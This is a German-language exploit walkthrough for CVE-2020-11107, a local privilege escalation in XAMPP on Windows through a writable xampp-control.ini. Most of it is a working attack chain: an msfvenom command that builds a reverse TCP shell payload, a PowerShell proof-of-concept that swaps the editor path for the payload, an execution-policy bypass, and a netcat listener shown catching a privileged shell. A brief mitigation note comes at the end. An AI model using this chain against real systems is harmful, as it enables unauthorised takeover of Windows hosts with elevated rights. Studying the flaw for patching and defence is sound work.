
CVE-2020-11107-Local-Privilege-Escalation-XAMPP-7.2.29-7.3.x-7.3.16-7.4.x-7.4.4
CVE-2020-11107 ist eine Lokale Privilegienausweitungs-Schwachstelle (LPE) in Apache Friends XAMPP unter Windows.
Ein unprivilegierter Benutzer kann die Konfigurationsdatei des XAMPP-Kontrollpanels (xampp-control.ini) ändern und den standardmäßigen Editor (notepad.exe) durch eine schädliche ausführbare Datei ersetzen.
Wenn ein anderer Benutzer (z. B. Administrator) über das Kontrollpanel Protokolle öffnet, wird die schädliche Binärdatei mit den Privilegien des Opfers ausgeführt, was zu einer Privilegienausweitung führt.
❗ Diese Schwachstelle betrifft weder Linux noch macOS.
xampp-control.ini ist global beschreibbarC:\xampp\xampp-control.ini
C:\xampp\xampp-control.exe
XAMPP-Version prüfen:
type C:\xampp\properties.ini
Beispielausgabe:
base_stack_version=7.3.10-1
base_stack_platform=windows-x64
✅ Die Version ist anfällig.
msfvenom -p windows/x64/shell_reverse_tcp \
LHOST=192.168.xxx.xxx LPORT=4444 \
-f exe -o msf.exe
mkdir C:\temp
# msf.exe nach C:\temp hochladen
Exploit-Skript (PowerShell):
# CVE-2020-11107 PoC
$file = "C:\xampp\xampp-control.ini"
$find = ((Get-Content $file)[2] -Split "=")[1]
$replace = "C:\temp\msf.exe"
(Get-Content $file) -replace $find, $replace | Set-Content $file
Skript ausführen:
powershell -ExecutionPolicy Bypass -File 50337.ps1
Das Opfer startet:
C:\xampp\xampp-control.exe
Dann öffnet es eine beliebige Logdatei im Kontrollpanel.
nc -lvnp 4444
✅ Ergebnis:
Connection received...
C:\WINDOWS\system32>
🎉 Privilegienausweitung erfolgreich
XAMPP auf eine der folgenden Versionen (oder neuer) aktualisieren:
Berechtigungen für folgende Datei einschränken:
C:\xampp\xampp-control.ini